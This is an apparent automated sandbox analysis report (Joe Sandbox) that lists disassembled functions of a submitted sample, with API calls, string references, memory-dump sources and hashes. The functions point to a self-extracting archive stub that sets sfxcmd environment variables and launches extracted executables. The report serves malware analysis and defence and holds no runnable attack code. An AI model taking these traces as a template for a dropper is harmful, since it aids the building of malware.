Opcode ID: 53f46dc4740fe687abab2e3d5e088dd8ba7dcf29da9e0e0bd0f2078779d58522
Instruction ID: 12b510b5bc33b0d7b7c06e7d389cc5d7a3680951ce754b5d59045ae6833fe0c8
Opcode Fuzzy Hash: 53f46dc4740fe687abab2e3d5e088dd8ba7dcf29da9e0e0bd0f2078779d58522
Instruction Fuzzy Hash: 8CD1C5B1028344ABC331DF50D899B9FBBF8BF8474AF50591DF98996140C7B0866CCB6A

Function 0023C73F Relevance: 51.2, APIs: 23, Strings: 6, Instructions: 428
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0023C744

Part of subcall function 0023B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0023B3FB

Part of subcall function 0023AF98: _wcschr.LIBVCRUNTIME ref: 0023B033

_wcslen.LIBCMT ref: 0023CA0A
_wcslen.LIBCMT ref: 0023CA13
SetWindowTextW.USER32(?,?), ref: 0023CA71
_wcslen.LIBCMT ref: 0023CAB3
_wcsrchr.LIBVCRUNTIME ref: 0023CBFB
GetDlgItem.USER32(?,00000066), ref: 0023CC36
SetWindowTextW.USER32(00000000,?), ref: 0023CC46
SendMessageW.USER32(00000000,00000143,00000000,0026A472), ref: 0023CC54
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0023CC7F

Strings

ProgramFilesDir, xrefs: 0023CB45
Software\Microsoft\Windows\CurrentVersion, xrefs: 0023CB1A
<#, xrefs: 0023C909
#, xrefs: 0023CB24
%s.%d.tmp, xrefs: 0023C940
<br>, xrefs: 0023C9D4

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
String ID: %s.%d.tmp$<br>$<#$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$#
API String ID: 986293930-1689199896
Opcode ID: fcbc9d00909b7cca86e37de5146016711f03965230c92d8ad1e435d1884943f5
Instruction ID: d75dadb8f7cd653687528e5f1033a795d8928e7c67ebe05ca6dd88c5a1d4a1e8
Opcode Fuzzy Hash: fcbc9d00909b7cca86e37de5146016711f03965230c92d8ad1e435d1884943f5
Instruction Fuzzy Hash: 6EE145F2910219AADF25DBA0ED85EEE73BCAF04350F5040A6F649E7040EB749F948F60

Function 0022DA67 Relevance: 26.9, APIs: 5, Strings: 10, Instructions: 663COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0022DA70
_wcschr.LIBVCRUNTIME ref: 0022DA91
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0022DAAC

Part of subcall function 0022C29A: _wcslen.LIBCMT ref: 0022C2A2

Part of subcall function 002305DA: _wcslen.LIBCMT ref: 002305E0

Part of subcall function 00231B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0022BAE9,00000000,?,?,?,0001042E), ref: 00231BA0

_wcslen.LIBCMT ref: 0022DDE9
__fprintf_l.LIBCMT ref: 0022DF1C

Strings

9%, xrefs: 0022DDD0
$%s:, xrefs: 0022DEFF
*messages***, xrefs: 0022DBFA
@%s:, xrefs: 0022DF06, 0022DF12
a, xrefs: 0022DC16
*messages***, xrefs: 0022DBC1
, xrefs: 0022DD6C
,, xrefs: 0022DF57
RTL, xrefs: 0022DEDE
R, xrefs: 0022DC0C

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$9%
API String ID: 557298264-4154308689
Opcode ID: 6f52f14e33a6fa7f03a1627fc89d4cde005431a107d182b0252ccd35292cdaf6
Instruction ID: ac6cc7abc65aa98d43b36e5655b88240d70751f7e1e80725c6e4f4d87f4fd62b
Opcode Fuzzy Hash: 6f52f14e33a6fa7f03a1627fc89d4cde005431a107d182b0252ccd35292cdaf6
Instruction Fuzzy Hash: E432E371920229EBCF28EFA4E845BEE77A5FF05300F41016AF905A7291E7B1DDA5CB50

Function 0023D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0023B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0023B579
Part of subcall function 0023B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0023B58A
Part of subcall function 0023B568: IsDialogMessageW.USER32(0001042E,?), ref: 0023B59E
Part of subcall function 0023B568: TranslateMessage.USER32(?), ref: 0023B5AC
Part of subcall function 0023B568: DispatchMessageW.USER32(?), ref: 0023B5B6

GetDlgItem.USER32(00000068,0027FCB8), ref: 0023D4E8
ShowWindow.USER32(00000000,00000005,?,?,?,0023AF07,00000001,?,?,0023B7B9,0025506C,0027FCB8,0027FCB8,00001000,00000000,00000000), ref: 0023D510
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0023D51B
SendMessageW.USER32(00000000,000000C2,00000000,002535F4), ref: 0023D529
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0023D53F
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0023D559
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0023D59D
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0023D5AB
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0023D5BA
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0023D5E1
SendMessageW.USER32(00000000,000000C2,00000000,002543F4), ref: 0023D5F0

Strings

\, xrefs: 0023D549

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: 39166ea67de8806f288094659303573478f27d1d8c8cf95481b0f83218d03841
Instruction ID: 5f821237286c27e169f230217add19eb0d0473453815c8006affbb1b867ebea1
Opcode Fuzzy Hash: 39166ea67de8806f288094659303573478f27d1d8c8cf95481b0f83218d03841
Instruction Fuzzy Hash: E9319071146742ABD301DF20AC4EFAB7BACEB86B05F000508F551D61D1EB659A188B77

Function 0023D78F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 0023D7AE
ShellExecuteExW.SHELL32(?), ref: 0023D8DE
ShowWindow.USER32(?,00000000), ref: 0023D91D
GetExitCodeProcess.KERNEL32(?,?), ref: 0023D959
CloseHandle.KERNEL32(?), ref: 0023D97F
ShowWindow.USER32(?,00000001), ref: 0023D9E1

Strings

.exe, xrefs: 0023D989
h#, xrefs: 0023D92E
r#, xrefs: 0023D911
.inf, xrefs: 0023D89A

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
String ID: .exe$.inf$h#$r#
API String ID: 36480843-2069258198
Opcode ID: a1ce398901ac029a2d3fdc307b4b53b03cf3672bc01e82ceb5fe3af6052b2a18
Instruction ID: 0c74665a08349d4c0bd4a3577db0904fa887d0ea8ffe3f5f7febd4e44b34ba99
Opcode Fuzzy Hash: a1ce398901ac029a2d3fdc307b4b53b03cf3672bc01e82ceb5fe3af6052b2a18
Instruction Fuzzy Hash: 5E51F6F4428382AADB31DF24F8447AB7BE4AF41744F04081EF9C597191E7B1DAA5CB52

Function 00243B72 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,?,00243C35,00000000,00000FA0,00282088,00000000,?,00243D60,00000004,InitializeCriticalSectionEx,00256394,InitializeCriticalSectionEx,00000000), ref: 00243C03

Strings

api-ms-, xrefs: 00243BC3
c*$, xrefs: 00243BBE, 00243BC8, 00243BD9

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$c*$
API String ID: 3664257935-4127777250
Opcode ID: f27f0bb01cf82789dacce2ceb9595961fac480176a58de439c82d495c05274d8
Instruction ID: c051e8c317dece14931b474743ed5df8797013e33857cda01b57435332a0c71d
Opcode Fuzzy Hash: f27f0bb01cf82789dacce2ceb9595961fac480176a58de439c82d495c05274d8
Instruction Fuzzy Hash: EA11E331A25722ABCB26CF68AC49B5E77A4DF017B5F250211E911EB290E770EF108AD5

Function 0024A95B Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,002457FB,002457FB,?,?,?,0024ABAC,00000001,00000001,2DE85006), ref: 0024A9B5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0024ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0024AA3B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0024AB35
__freea.LIBCMT ref: 0024AB42

Part of subcall function 00248E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00244286,?,0000015D,?,?,?,?,00245762,000000FF,00000000,?,?), ref: 00248E38

__freea.LIBCMT ref: 0024AB4B
__freea.LIBCMT ref: 0024AB70

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: eb15fd3bb6c49bd7dd89f23982cc466e385b0a52c4dffc69e8197d4b0559796c
Instruction ID: be78e1cfc4796c83fcfd4bbf884f5640f2a14f4ad29920698a4347778769d171
Opcode Fuzzy Hash: eb15fd3bb6c49bd7dd89f23982cc466e385b0a52c4dffc69e8197d4b0559796c
Instruction Fuzzy Hash: 2351D172670217AFDB298F64CC42EBFB7AAEB64754F154628FC04D6140EB74DC60CA92

Function 002298E0 Relevance: 7.6, APIs: 5, Instructions: 111
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00227760,?,00000005,?,00000011), ref: 0022995F
GetLastError.KERNEL32(?,?,00227760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0022996C
CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00227760,?,00000005,?), ref: 002299A2
GetLastError.KERNEL32(?,?,00227760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 002299AA
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00227760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 002299F9

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: d49335b38a939b6bbf651c01d5f1f10349b248c597c3c3f8163de12b634221a0
Instruction ID: 962922b5ef209f1237dbe202e4be93c72d7e11ba3733b17f0e4bc9ff00543d5f
Opcode Fuzzy Hash: d49335b38a939b6bbf651c01d5f1f10349b248c597c3c3f8163de12b634221a0
Instruction Fuzzy Hash: 1A311530554356BFE7209F64EC4ABAABB94BB04330F100B1DF9A1961D0D7B4A9E4CB95

Function 0023B568 Relevance: 7.5, APIs: 5, Instructions: 38
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0023B579
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0023B58A
IsDialogMessageW.USER32(0001042E,?), ref: 0023B59E
TranslateMessage.USER32(?), ref: 0023B5AC
DispatchMessageW.USER32(?), ref: 0023B5B6

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: a7ead8689a5cceadd1d1b080e34ba5fac31379dd43dfabe20830602a2b1b7bb8
Instruction ID: c19ab45d017f6e83f0e9fab4043fcf998bf23680edeaf8c28ddd91c0b28d981b
Opcode Fuzzy Hash: a7ead8689a5cceadd1d1b080e34ba5fac31379dd43dfabe20830602a2b1b7bb8
Instruction Fuzzy Hash: 44F0D0B5A0211AABCB20DFE5EC4CDDB7FBCEE057917404515B509D2010EB74E605CBB0

Function 0023ABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 0023ABC2
SHAutoComplete.SHLWAPI(?,00000010), ref: 0023ABF9

Part of subcall function 00231FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0022C116,00000000,.exe,?,?,00000800,?,?,?,00238E3C), ref: 00231FD1

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0023ABE9

Strings

EDIT, xrefs: 0023ABCD, 0023ABD8, 0023ABE5

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: 11129872e5afbfe01d5bf9ea545ecf392cfa99c5011a25447374d7d2e24eb189
Instruction ID: 5621bec00d4fcda07a715a34cc816ff7beef3177637607cb2e940914c343cf9d
Opcode Fuzzy Hash: 11129872e5afbfe01d5bf9ea545ecf392cfa99c5011a25447374d7d2e24eb189
Instruction Fuzzy Hash: 29F0E27261132976DB209A24AC09F9FB2AC9B46F00F484021BE40A2080D760DA5186B6

Function 0023AC16 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0023081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00230836
Part of subcall function 0023081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0022F2D8,Crypt32.dll,00000000,0022F35C,?,?,0022F33E,?,?,?), ref: 00230858

OleInitialize.OLE32(00000000), ref: 0023AC2F
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0023AC66
SHGetMalloc.SHELL32(00268438), ref: 0023AC70

Strings

riched20.dll, xrefs: 0023AC1E

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll
API String ID: 3498096277-3360196438
Opcode ID: d44e19afa2c50180e66e9c4d6ac119d377d3c45952a77ad1e59f4241c4cfb85c
Instruction ID: 0c9ff82ea028ad8299553d4bde551f60fe238a839c04438d99ad40467c079a65
Opcode Fuzzy Hash: d44e19afa2c50180e66e9c4d6ac119d377d3c45952a77ad1e59f4241c4cfb85c
Instruction Fuzzy Hash: DEF01DB5D00209ABCB10EFA9E8499EFFFFCEF95B05F00415AE815E2241DBB456458FA1

Function 0023DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0023DBF4
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0023DC30

Strings

sfxcmd, xrefs: 0023DBEF
sfxpar, xrefs: 0023DC2B

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: d2208a3447007185ecfbd83f3767c4395db6da143f532f505694f6a6f8b53921
Instruction ID: 0ae77e0bf98aad231d512335978189b2ebb4c8869cec0d9c817c60fd651550bf
Opcode Fuzzy Hash: d2208a3447007185ecfbd83f3767c4395db6da143f532f505694f6a6f8b53921
Instruction Fuzzy Hash: 45F0ECF2434735A7CF201FA5AC0ABFA3B58AF15B82F045852BD8995051E6F0C964DAB4

Function 00229785 Relevance: 6.1, APIs: 4, Instructions: 56
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00229795
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 002297AD
GetLastError.KERNEL32 ref: 002297DF
GetLastError.KERNEL32 ref: 002297FE

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 07321a1c811ba375e742acb2190bed342c93ae3f3662a1792c95bef8e27b69ea
Instruction ID: 2449412230fb3fce9aba12312b7c774e008e888adc1377f6fbb1022ec2a11e53
Opcode Fuzzy Hash: 07321a1c811ba375e742acb2190bed342c93ae3f3662a1792c95bef8e27b69ea
Instruction Fuzzy Hash: E711C270930325FBDF209FA4F80467A77A9FB02361F148629F416C5190D7708EE4DB62

Function 0024AD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,002440EF,00000000,00000000,?,0024ACDB,002440EF,00000000,00000000,00000000,?,0024AED8,00000006,FlsSetValue), ref: 0024AD66
GetLastError.KERNEL32(?,0024ACDB,002440EF,00000000,00000000,00000000,?,0024AED8,00000006,FlsSetValue,00257970,FlsSetValue,00000000,00000364,?,002498B7), ref: 0024AD72
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0024ACDB,002440EF,00000000,00000000,00000000,?,0024AED8,00000006,FlsSetValue,00257970,FlsSetValue,00000000), ref: 0024AD80

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 7435a5f39fbe5455747fb34f6fcfa8f19c7bc8b5e5812b2d924a0062cef28860
Instruction ID: b4356cc1721b49e54305f1b3298b5c22e219c4c9ed45190d4279fb4cdd6a133a
Opcode Fuzzy Hash: 7435a5f39fbe5455747fb34f6fcfa8f19c7bc8b5e5812b2d924a0062cef28860
Instruction Fuzzy Hash: F2014736AA1323EBC7268E68AC48A677B58EF04BB3B100220FC06D3590D730DC1086E1

Function 0024BA27 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 002497E5: GetLastError.KERNEL32(?,00261098,00244674,00261098,?,?,002440EF,?,?,00261098), ref: 002497E9
Part of subcall function 002497E5: _free.LIBCMT ref: 0024981C
Part of subcall function 002497E5: SetLastError.KERNEL32(00000000,?,00261098), ref: 0024985D
Part of subcall function 002497E5: _abort.LIBCMT ref: 00249863

Part of subcall function 0024BB4E: _abort.LIBCMT ref: 0024BB80
Part of subcall function 0024BB4E: _free.LIBCMT ref: 0024BBB4

Part of subcall function 0024B7BB: GetOEMCP.KERNEL32(00000000,?,?,0024BA44,?), ref: 0024B7E6

_free.LIBCMT ref: 0024BA9F
_free.LIBCMT ref: 0024BAD5

Strings

p%, xrefs: 0024BAC9

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
